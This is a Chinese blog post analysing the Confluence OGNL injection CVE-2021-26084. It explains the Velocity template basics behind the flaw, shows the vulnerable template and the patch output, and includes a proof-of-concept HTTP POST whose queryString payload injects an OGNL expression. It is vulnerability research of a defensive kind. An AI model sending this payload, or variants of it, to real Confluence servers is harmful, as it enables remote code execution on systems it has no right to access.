• CVE-2021-26084 漏洞分析


    基础知识

    Velocity

    • .vm 结尾的文件一般为Velocity模板文件
    • $action
      • $action 是 velocity 上下⽂中的⼀个变量,⼀般在进⾏模板渲染前会设置到 context ⾥⾯。
      • $action 是当前访问路由对应的具体 Action 类。
      • $action.xxx 表⽰取对应 Action 类的 xxx 属性值

    • ${} 和 $!{}
      • ${} 输出表达式的计算结果,并进行过滤
      • $!{} 原样输出表达式的计算结果,不进行任何过滤
    • Velocity自定义标签
      • velocity ⾃定义的标签必须实现 Directive 类的 getName()、getType()、render() 三个⽅法。
      • getName() ⽅法表⽰标签的名字;getType() ⽅法则表⽰是⾏标签(LINE) 还是块标签(BLOCK); render() ⽅法则⽤来实现标签的具体处理逻辑。
    • velocity.properties 文件
      • 模板引擎初始化时会加载此文件
      • 配置log, 字符集编码等
      • userdirective:自定义函数路径

    WebWork

    • 路由逻辑

    Confluence

    • Confluence 7.12.3 依赖 Velocity 1.6.4
    • Confluence 自定义 Velocity 标签 Tag

    OGNL表达式注入

    漏洞环境版本

    • 7.12.3

    漏洞原理

    • Confluence自定义的tag标签在渲染过程中在渲染$!的变量时会使用Ognl表达式来渲染
    • 检查手段被绕过
    • POC
    1. POST /pages/doenterpagevariables.action HTTP/1.1
    2. Host: 0.0.0.0
    3. Pragma: no-cache
    4. Cache-Control: no-cache
    5. Upgrade-Insecure-Requests: 1
    6. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
    7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    8. Accept-Encoding: gzip, deflate
    9. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    10. Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
    11. Connection: close
    12. Content-Type: application/x-www-form-urlencoded
    13. Content-Length: 45
    14. queryString=aaaa\u0027%2b#{3*333}%2b\u0027bbb
    • 对应模板文件: confluence/pages/createpage-entervariables.vm
    1. <html>
    2. <head>
    3. #requireResource("confluence.web.resources:page-templates")
    4. <title>$action.getText("page.template.wizard")</title>
    5. </head>
    6. <body>
    7. #parse ( "/template/includes/actionerrors.vm" )
    8. #applyDecorator("root")
    9. #decoratorParam("helper" $action.helper)
    10. #decoratorParam("context" "space-pages")
    11. #decoratorParam("mode" "create-page")
    12. <div class="padded">
    13. <div class="steptitle" style="margin-top: 10px">$action.getText('pagevariables.step2')</div>
    14. <p>$action.getText('text.pagevariables.step2.instructions')</p>
    15. <div class="smallfont view-template">
    16. <div class="wiki-content">$action.renderedTemplateContent</div>
    17. </div>
    18. <form name="filltemplateform" method="POST" action="doenterpagevariables.action">
    19. #form_xsrfToken()
    20. #tag ("Hidden" "name='queryString'" "value='$!queryString'")
    21. #tag ("Hidden" "name='templateId'" "value='$pageTemplate.id'")
    22. #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")
    23. #tag ("Hidden" "name='title'" "value=title")
    24. #tag ("Hidden" "name='parentPageId'" "value=parentPageId")
    25. #tag ("Hidden" "name='fromPageId'" "value=fromPageId")
    26. #tag ("Hidden" "name='spaceKey'" "value=spaceKey")
    27. <div class="aui-toolbar2" role="toolbar">
    28. <div class="aui-toolbar2-inner">
    29. <input class="aui-button" type="button" value="$action.getText('back.witharrows.name')" onclick="javascript:history.go(-1)">
    30. #tag( "Submit" "name='confirm'" "id=confirm" "value='next.name'" "theme='notable'" "cssClass='aui-button'")
    31. </div>
    32. </div>
    33. </form>
    34. #parse ( "/pages/page-breadcrumbs.vm" )
    35. </div>
    36. #end
    37. </body>
    38. </html>

    漏洞修复

    补丁

    • 补丁脚本运行结果
    1. File 1: 'confluence/users/user-dark-features.vm':
    2. a. backing up file.. done
    3. b. updating file.. done
    4. c. showing file changes..
    5. 70c70
    6. < #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value='$!action.featureKey'" "theme='aui'" "template='text.vm'")
    7. ---
    8. > #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value=featureKey" "theme='aui'" "template='text.vm'")
    9. d. validating file changes.. ok
    10. e. file updated successfully!
    11. File 2: 'confluence/login.vm':
    12. a. backing up file.. done
    13. b. updating file.. done
    14. c. showing file changes..
    15. 147c147
    16. < #tag( "Hidden" "name='token'" "value='$!action.token'" )
    17. ---
    18. > #tag( "Hidden" "name='token'" "value=token" )
    19. d. validating file changes.. ok
    20. e. file updated successfully!
    21. File 3: 'confluence/pages/createpage-entervariables.vm':
    22. a. backing up file.. done
    23. b. updating file.. done
    24. c. showing file changes..
    25. 24c24
    26. < #tag ("Hidden" "name='queryString'" "value='$!queryString'")
    27. ---
    28. > #tag ("Hidden" "name='queryString'" "value=queryString")
    29. 26c26
    30. < #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")
    31. ---
    32. > #tag ("Hidden" "name='linkCreation'" "value=linkCreation")
    33. d. validating file changes..ok
    34. e. file updated successfully!
    35. File 4: 'confluence/template/custom/content-editor.vm':
    36. a. backing up file.. done
    37. b. updating file.. done
    38. c. showing file changes..
    39. 64c64
    40. < #tag ("Hidden" "name='queryString'" "value='$!queryString'")
    41. ---
    42. > #tag ("Hidden" "name='queryString'" "value=queryString")
    43. 85c85
    44. < #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value='${templateId}'")
    45. ---
    46. > #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value=templateId")
    47. d. file updated successfully!
    48. File 5: 'confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader*.jar':
    49. a. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar..
    50. Archive: confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
    51. inflating: ./templates/editor-preload-container.vm
    52. b. updating file.. done
    53. c. showing file changes..
    54. 56c56
    55. < #tag ("Hidden" "id=syncRev" "name='syncRev'" "value='$!{action.syncRev}'")
    56. ---
    57. > #tag ("Hidden" "id=syncRev" "name='syncRev'" "value=syncRev")
    58. d. validating file changes.. ok
    59. e. updating confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar with ./templates/editor-preload-container.vm..updating: templates/editor-preload-container.vm (deflated 59%)
    60. -rw-r--r-- 1 zhangxinqi staff 13369 8 27 02:02 confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
    61. f. cleaning up temp files..ok
    62. g. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar again to check changes within JAR..
    63. Archive: confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
    64. inflating: ./templates/editor-preload-container.vm
    65. h. validating file changes for file within updated JAR.. ok
    66. i. cleaning up temp files..ok
    67. Update completed!
    • 将模板文件中的$!删除
    • $action $!action 都删除
    • 所有的改动都位于tag标签下
    • 涉及5个文件的更改

    参考资料

  • 相关阅读:
    leetcode891:子序列宽度之和
    【深蓝学院】手写VIO第6章--视觉前端--笔记
    精英VS普通测试开发程序员?截然不同......
    VueTreeselect在使用过程中遇到的问题及解决方法
    centos or redhat?
    找准边界,吃定安全 | 威胁情报加持,泛边界下的全局主动防御体系如何着手?
    1023 组个最小数(满分)
    Java并发编程--变量可见性、避免指令重排,还得是用它
    【数据结构-队列】双端队列
    axios的两种请求方法
  • 原文地址:https://blog.csdn.net/why811/article/details/133887728